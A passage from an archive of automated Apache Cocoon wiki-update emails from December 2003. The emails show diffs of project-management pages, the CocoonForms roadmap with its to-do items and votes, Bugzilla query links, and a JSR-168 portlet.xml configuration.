bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it - * Bugs changed in the last [two|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=2&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] or [seven|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=7&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&! bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] days (''changedin'' URL parameter selects number of days). - - !!Cocoon Roadmap - * __CocoonForms__ roadmap (using bugzilla dependencies to group issues together): - ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] - **[CocoonForms 1.0 - Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms - **[CocoonForms - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms - * __Flowscript__ roadmap (using bugzilla dependencies to group issues together): - ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25280] - **[Flowscript - next release|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25283] - all issues necessary for the next release of Flowscript - **[Flowscript - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25284] - all issues NOT necessary for the next (=first) release of Flowscript - - !! Utilities - *[add a new Cocoon2 issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?product=Cocoon%202] - direct link to enter a new issue into Bugzilla. - *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] - - direct link to enter a new issue into Bugzilla. - From [email protected] Mon Dec 08 15:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6891 invoked from network); 8 Dec 2003 15:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 15:00:11 -0000 Received: (qmail 50523 invoked by uid 500); 8 Dec 2003 15:00:06 -0000 Delivered-To: [email protected] Received: (qmail 50501 invoked by uid 500); 8 Dec 2003 15:00:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50481 invoked from network); 8 Dec 2003 15:00:05 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 15:00:05 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8F05p26883 for <[email protected]>; Mon, 8 Dec 2003 16:00:06 +0100 Date: Mon, 8 Dec 2003 16:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ProjectManagement Main CocoonFormsRoadmap BugzillaQueries Mon Dec 8 16:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 3 on Mon Dec 8 14:23:07 2003 by BertrandDelacretaz - We use [Bugzilla|http://nagaoya.apache.org/bugzilla] as issue tracking tool which we use for three different tasks. Find here our guidelines [how we use Bugzilla|HowWeUseBugzilla] especially the differnet meanings of the issue states. ? - + We use [Bugzilla|http://nagaoya.apache.org/bugzilla] as issue tracking tool which we use for three different tasks. Find here our guidelines [how we use Bugzilla|HowWeUseBugzilla] especially the different meanings of the issue states. ? + - these blocks definitly stopy a release because of broken core functionality ? - + these blocks definitly stop a release because of broken core functionality Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 312 on Mon Dec 8 14:42:27 2003 by ArjeCahn - ** How me [manage|ProjectManagement] the Cocoon project --[ReinhardPoetz] ? ^ + ** How we [manage|ProjectManagement] the Cocoon project --[ReinhardPoetz] ? ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonFormsRoadmap , version: 12 on Mon Dec 8 14:08:03 2003 by ReinhardPoetz + The [CocoonForms roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] has moved into Bugzilla. - !!!Introduction - Cocoon Forms seems to be the hottest topic in the Cocoon community - at least - I got this impression after following the Cocoon mail-lists. - Thanks to the great efforts of Bruno, Sylvain, Marc, Antonio, Jeremy and some others - we already have a great solution. But there are still a few issues - open to mark Cocoon Forms as stable finally. - - This document should help to - *collect all open issues preventing us from a stable release - *transform these open issues into a roadmap that shows our users - what they can expect and to get a feeling how long it will take - until they get a stable block - *get an overview who is working on which item - - !!What can you do if you find this page? - *add new items to the todo list - *vote for a certain feature (see the voting rules below) - *but __don't__ add items to the roadmap section because - we decide on them 'together' on [email protected] - *add your name to the __who__ paragraph in one of the items - (this is no legal committment but it should show others that - somebody else is working on a certain feature - if you don't have - time to do it, please add a note or simply delete your name) - - !!Rules - *Everybody can add his requirements into the 'ToDo'-section of this - document. On cocoon-dev we discuss the roadmap and add the open - issues into the according category (either first stable release or - later release). - - *Everybody can add his vote to an issue of the 'ToDo'-section so that - we get a feeling what is required (earlier). - **+1 means: absolutly necessary for the first stable release - **+0 means: not necessary now - **-1 means: I don't want to see this feature being part of CocoonForms - - - !!!Cocoon Forms Roadmap - - - !!First stable release - TBD - - !!Later releases - TBD - - !!Rejected features - TBD - - !!!ToDo's - - [1] move Woody into CocoonForms block \\ - [2] support for multi-page forms \\ - [3] general review of all XML elements \\ - [4] datatypes repository \\ - [5] JXTemplate: add a CocoonForms taglib \\ - [6] Multi-sources binding \\ - [7] use another expression language (replace xReporter expressions) \\ - [8] widgets \\ - [9] styles \\ - [10] widget interface: setValidationError \\ - [11] calculated fields \\ - [12] default values for fields \\ - [13] checking validity of id's \\ - [14] Subforms \\ - [15] Utility checking form definition and form template \\ - [16] Enhanced validation for selection lists \\ - [17] AggregateField \\ - [18] woody form-model - JavaScript model \\ - [19] binding isolation woody model \\ - [20] cache compiled bindings \\ - [21] enum convertor \\ - [22] widget definition reuse \\ - [23] template and markup reuse \\ - [24] namespaced widgets \\ - [25] dynamically create and switch between sets of widgets \\ - [26] clean up samples\\ - [27] improve documentation\\ - [28] form state info\\ - [29] repeater row ordening\\ - [30] extended lookups\\ - [31] multiple templates - partial/secure submits\\ - [32] dynamic addressing of widgets\\ - - - ![#1] move Woody into CocoonForms block - (rename all packages, namespaces and namespace-prefixes) - - who: ?\\ - status: open\\ - vote: +1 (RP),\\ - - ---- - - ![#2] support for multi-page forms - - who: [ReinhardPoetz] (start in december with it, but no promise ;-) - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - ---- - - ![#3] general review of all XML elements - - Is our naming consistent? Are there better element/attribute names?\\ - see [XML formats|WoodyFileFormats]\\ - - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#4] datatypes repository - - who: ?\\ - status: open\\ - vote: +0.5 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#5] JXTemplate: add a CocoonForms taglib - - who: ?\\ - status: open - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#6] Multi-sources binding - - make it possible to bind more than one source (bean, xml-document, ...) - at least we need a recommendation how to handle this (this could also - be to create one 'big' bean that contains all values - - reported by: [Reinhard Poetz]\\ - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#7] use another expression language (replace xReporter expressions) - - evaluate other, more standard, expression engines such as Jexl and JXPath - and compare with the currently used xreporter-expression package.\\ - - who: ?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - ---- - - ![#8] widgets - *widget for semi-structured content - who:?\\ - status: open\\ - vote: +1 (RP), +1 ([UC|UgoCei])\\ - *tree widget\\ - who:?\\ - status: open \\ - vote: +0 (RP), \\ - *validation widget\\ - validation widget: a widget that has no value of its own, but just serves - to perform validation on or between other widgets (for validation rules that - don't belong to a specific widget).\\ - who:?\\ - status: open\\ - vote: +1 (RP), \\ - - ---- - - ![#9] styles - [#9a] refactoring current styles - for making extension simpler ... - - who: [JH|JoergHeinicke] (but probably without enough time in the next weeks, months)\\ - status: open\\ - vote: +0 (RP), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - [#9b] add support for XUL, simple HTML, ... - - who: [JH|JoergHeinicke] (but probably without enough time in the next weeks, months)\\ - status: open\\ - vote: +0 (RP),\\ - - ---- - - ![#10] widget interface: setValidationError - Add an setValidationError or addValidationError method to the Widget interface - - who:?\\ - status: (partly done: the field widget already has this)\\ - vote: \\ - - ---- - - ![#11] calculated fields - - who:?\\ - status: open\\ - vote: +0 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#12] default values for fields - - who:?\\ - status: open\\ - vote: +1 (RP), +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#13] checking validity of id's - (should not contain spaces or dots, or characters not allowed in request parameters) - - who:?\\ - status: open\\ - vote: +1 (RP), - - ---- - - ![#14] Subforms - Including one form in another form\\ - who:?\\ - status: open \\ - vote: +0 (RP), - - ---- - - ![#15] Utility checking form definition and form template - make an utility that checks that all (required) fields defined in the - form definition are present in the form layout template\\ - - who:?\\ - status: open \\ - vote: -0.5 (RP - don't know if this is possible if we have a global datatype repository), - - ---- - - ![#16] Enhanced validation for selection lists - for fields with a selection list, it should be checked that the submitted - value is effectively in the selection list (to avoid problems with people playing - with request parameters). Since this could potentially be expensive (if the - selection list is dynamically generated), maybe do this as a seperate validation rule. - - who:?\\ - status: open \\ - vote: +0 (RP)\\ - - ---- - - ![#17] AggregateField - adapt the AggregateField so it can aggregate the other way around as - well (see [mail-list-proposal|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=105712568410208&w=2]) - - requested by: [mpo|MarcPortier]\\ - who:?\\ - - status: open \\ - vote: +0 (RP) \\ - - ---- - - ![#18] woody form-model - JavaScript model - think about transfering (part of) the woody form-model information over to the - client as a javascript model that can be interpreted by a set of client-side - javascript functions inside the browser\\ - requested by: [mpo|MarcPortier]\\ - who:?\\ - status: open \\ - +vote: \\ - - ---- - - ![#19] binding isolation woody model - make the 'binding' isolate the woody model from the business model - --> fieldbinding should perform a clone() - - requested by: [mpo|MarcPortier]\\ - who:?\\ - status: open \\ - vote: \\ - - ---- - - ![#20] cache compiled bindings - - who:?\\ - status: open \\ - vote: \\ - - ---- - - ![#21] enum convertor - create an "enum" base type and an "enum" convertor for types that - implement the [TypesafeEnumPattern|http://developer.java.sun.com/developer/Books/shiftintojava/page1.html#replaceenums] - - requested by: [ugo|UgoCei]\\ - who: [ugo|UgoCei]\\ - status: done\\ - vote: \\ - - ---- - - ![#22] widget definition reuse - - create a way to define sets of widget definitions and a way to - reference the sets to reuse them multiple times in a form definition - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#23] template and markup reuse - - create a way to define sets of templates and markup and a way to - reference the sets to reuse them multiple times in a form template - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#24] namespaced widgets - - create a way to wrap a set of widgets in a namespace to allow - their widget ids to be reused multiple times in a form - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: patch posted at [TimLarson]\\ - vote:\\ - - ---- - - ![#25] dynamically create and switch between sets of widgets - - create a way to have staticly specified sets of widgets created - dynamically on demand and a way to control which set of widgets - (with corresponding templates and markup) is processed and displayed. - - requested by: [tim|TimLarson]\\ - who: [tim|TimLarson]\\ - status: preliminary patch posted at [TimLarson], changes coming\\ - vote:\\ - - ---- - - ![#26] clean up samples - - the samples can use some cleanup. I'm thinking of: - * renaming the form1 sample to "widgetdemo", renaming the form2 sample to "bindingdemo" - * move each sample to a seperate subdir, with its own sitemap, to avoid complexity for anyone trying to find out how things fit together - * remove use of XSP except for the action-based demo - - requested by: [Bruno|BrunoDumon]\\ - who: open\\ - status: open\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#27] improve documentation - - Docs can always be better. - - requested by: [Bruno|BrunoDumon]\\ - who: [Bruno|BrunoDumon], ...\\ - status: in continuous progress\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#28] form state info - - a way to retrieve state information from a form - * in general: which tab, which view, which widget is currently selected - * for repeaters: cursor info to know which row is active and to introduce functions like NextRow, PrevRow, FirstRow and LastRow - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB)\\ - - ---- - - ![#29] repeater row ordening - - clickable row headers for sorting repeater rows - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 ([AH|AndreasHochsteger])\\ - - ---- - - ![#30] extended lookups - - a combo box is a simple way to lookup a value and has a number of limitations; - an extended lookup should deal with these limitations; - the idea is to activate a new page in which one has more control over the interaction; \\ - aspects: - * no limitations to the number of rows in a list (in big lists one can use a pagination like interaction) - * multiple columns and control over which columns are shown and which are not - * control over filtering and ordening of rows - * returning multiple key values instead of only one key value - * lists will only be populated when they are requested for and are not a part of the source page like combo boxes - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 ([UC|UgoCei])\\ - - ---- - - ![#31] multiple templates - partial/secure submits - - * multiple templates(views) for one form to allow switching between certain views like user/service/admin view or list/detail view etc (see also [23]) - * partial submits: submitting a subset of all the widgets without overwriting the other widgets with null values (see also [this thread|http://marc.theaimsgroup.com/?t=106931615400001&r=1&w=2]) - * secure submits: checking the "to-expect" widgets in the request string upon sumbit (see also [15]) - - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB), +1 ([AH|AndreasHochsteger]), +1 ([UC|UgoCei])\\ - - - ---- - - ![#32] dynamic addressing of widgets - - in order to be able to design dynamic templates(views) for a form all widgets in a form instance should be addressable using JxPath-like expressions; - something like: <wt:widget id="repeater1/row[[3]/repeater2/row[[4]/widgetname"/> - (see also [this thread|http://marc.theaimsgroup.com/?t=106922746300002&r=1&w=2]) - * related to this: extending the form api so all widgets (and validation messages) are itteratable - - - requested by: Danny Bols\\ - who: open\\ - status: open\\ - vote: +1 (DB), +1 ([AH|AndreasHochsteger])\\ - Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 7 on Mon Dec 8 14:09:26 2003 by ReinhardPoetz - Here are a few __standard__ queries for everyday use: + This document has become part of our general [ProjectManagement] information page. - !! Lists of bugs - * Open Cocoon2 bugs: [bugs only|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] , [all issues|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&em! ailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] (the first query doesn't include patches and enhancements, only bugs) - *[all provided patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&bug_severity=Enhancement&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=substring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] - *[all assigned bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it - * Bugs changed in the last [two|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=2&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] or [seven|http://nagoya.apache.org/bugzilla/buglist.cgi?changedin=7&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&! bugidtype=include&bug_id=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] days (''changedin'' URL parameter selects number of days). - - !!Cocoon Roadmap - * __CocoonForms__ roadmap (using bugzilla dependencies to group issues together): - ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] - **[CocoonForms 1.0 - Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms - **[CocoonForms - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms - * __Flowscript__ roadmap (using bugzilla dependencies to group issues together): - ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25280] - **[Flowscript - next release|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25283] - all issues necessary for the next release of Flowscript - **[Flowscript - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25284] - all issues NOT necessary for the next (=first) release of Flowscript - - !! Utilities - *[add a new Cocoon2 issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?product=Cocoon%202] - direct link to enter a new issue into Bugzilla. - *[add a new Cocoon2/CocoonForms issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?reporter=reinhard%40apache.org&product=Cocoon+2&version=Current+CVS+2.1&component=CocoonForms&rep_platform=Other&op_sys=other&priority=Other&bug_severity=Enhancement&bug_status=NEW&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&maketemplate=Remember+values+as+bookmarkable+template&form_name=enter_bug] - - direct link to enter a new issue into Bugzilla. - From [email protected] Mon Dec 08 16:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42292 invoked from network); 8 Dec 2003 16:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 16:00:09 -0000 Received: (qmail 62072 invoked by uid 500); 8 Dec 2003 16:00:04 -0000 Delivered-To: [email protected] Received: (qmail 62040 invoked by uid 500); 8 Dec 2003 16:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62022 invoked from network); 8 Dec 2003 16:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 16:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8G04p26911 for <[email protected]>; Mon, 8 Dec 2003 17:00:04 +0100 Date: Mon, 8 Dec 2003 17:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JSR168Portlet ProjectManagement Mon Dec 8 17:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JSR168Portlet , version: 2 on Mon Dec 8 16:09:49 2003 by Vadim - * portal.xml: ? - + * portlet.xml: ? ++ + {{{ + <?xml version="1.0" encoding="UTF-8"?> + + <portlet-app xmlns="http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd" + version="1.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd"> + + <portlet> + <portlet-name>CocoonPortlet</portlet-name> + <display-name>JSR-168 Cocoon Portlet</display-name> + <portlet-class>org.apache.cocoon.portlet.CocoonPortlet</portlet-class> + + <!-- + This parameter indicates the category id of the logger from the LogKit + configuration used by the CocoonServlet. + --> + <init-param> + <name>portlet-logger</name> + <value>access</value> + </init-param> + + <!-- + Causes all files in multipart requests to be processed. + Default is false for security reasons. + Unsupported values will be interpreted as false. + --> + <init-param> + <name>enable-uploads</name> + <value>true</value> + </init-param> + + <!-- + Causes all files in multipart requests to be saved to upload-dir. + Default is true for security reasons. + Unsupported values will be interpreted as false. + --> + <init-param> + <name>autosave-uploads</name> + <value>true</value> + </init-param> + + <!-- + Specify handling of name conflicts when saving uploaded files + to disk. Acceptable values are deny, allow, rename (default). + Files are renamed x_filename where x is an integer value incremented + to make the new filename unique. + --> + <init-param> + <name>overwrite-uploads</name> + <value>rename</value> + </init-param> + + <!-- + Specify maximum allowed size of the upload. Defaults to 10 Mb. + + <init-param> + <name>upload-max-size</name> + <value>10000000</value> + </init-param> + --> + + <!-- + If you set this parameter to 'true' or 'yes', Cocoon will add processing + time to the end of each response. Value 'hide' adds processing time as an HTML + comment. By default, processing time is not added (corresponds to value 'no'). + + <init-param> + <name>show-time</name> + <value>hide</value> + </init-param> + --> + + <!-- + If true or not set, this class will try to catch and handle all Cocoon exceptions. + If false, it will rethrow them to the servlet container. + --> + <init-param> + <name>manage-exceptions</name> + <value>true</value> + </init-param> + + <!-- + Set encoding used by the container. If not set the ISO-8859-1 encoding will be assumed. + + <init-param> + <name>container-encoding</name> + <value>utf-8</value> + </init-param> + --> + + <!-- + Set form encoding. This will be the character set used to decode request parameters. + If not set the ISO-8859-1 encoding will be assumed. + + <init-param> + <name>form-encoding</name> + <value>utf-8</value> + </init-param> + --> + + <expiration-cache>-1</expiration-cache> + + <supports> + <mime-type>text/html</mime-type> + <portlet-mode>VIEW</portlet-mode> + <portlet-mode>EDIT</portlet-mode> + <portlet-mode>HELP</portlet-mode> + </supports> + + <supported-locale>en</supported-locale> + + <portlet-info> + <title>JSR-168 Cocoon Portlet</title> + <short-title>Cocoon Portlet</short-title> + <keywords>Apache, Cocoon, XML, Jakarta, Pluto, Portlet, WSRP, WSRP4J, JSR-168</keywords> + </portlet-info> + </portlet> + </portlet-app> + }}} Page: http://wiki.cocoondev.org/Wiki.jsp?page=ProjectManagement , version: 4 on Mon Dec 8 15:21:50 2003 by TimLarson - these blocks definitly stop a release because of broken core functionality + these blocks definitely stop a release because of broken core functionality ? + From [email protected] Mon Dec 08 17:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72287 invoked from network); 8 Dec 2003 17:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 8 Dec 2003 17:00:10 -0000 Received: (qmail 72397 invoked by uid 500); 8 Dec 2003 17:00:03 -0000 Delivered-To: [email protected] Received: (qmail 72373 invoked by uid 500); 8 Dec 2003 17:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72349 invoked from network); 8 Dec 2003 17:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 8 Dec 2003 17:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB8H04p26949 for <[email protected]>; Mon, 8 Dec 2003 18:00:04 +0100 Date: Mon, 8 Dec 2003 18:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JSR168Portlet ProjectManagement Mon Dec 8 18:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JSR168Portlet , version: 5 on Mon Dec 8 16:12:48 2003 by Vadim - xsi:schemaLocation="http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd"> + xsi:schemaLocation=" + http://java.sun.com/xml/ns/portlet/portlet-app_1_0.xsd + 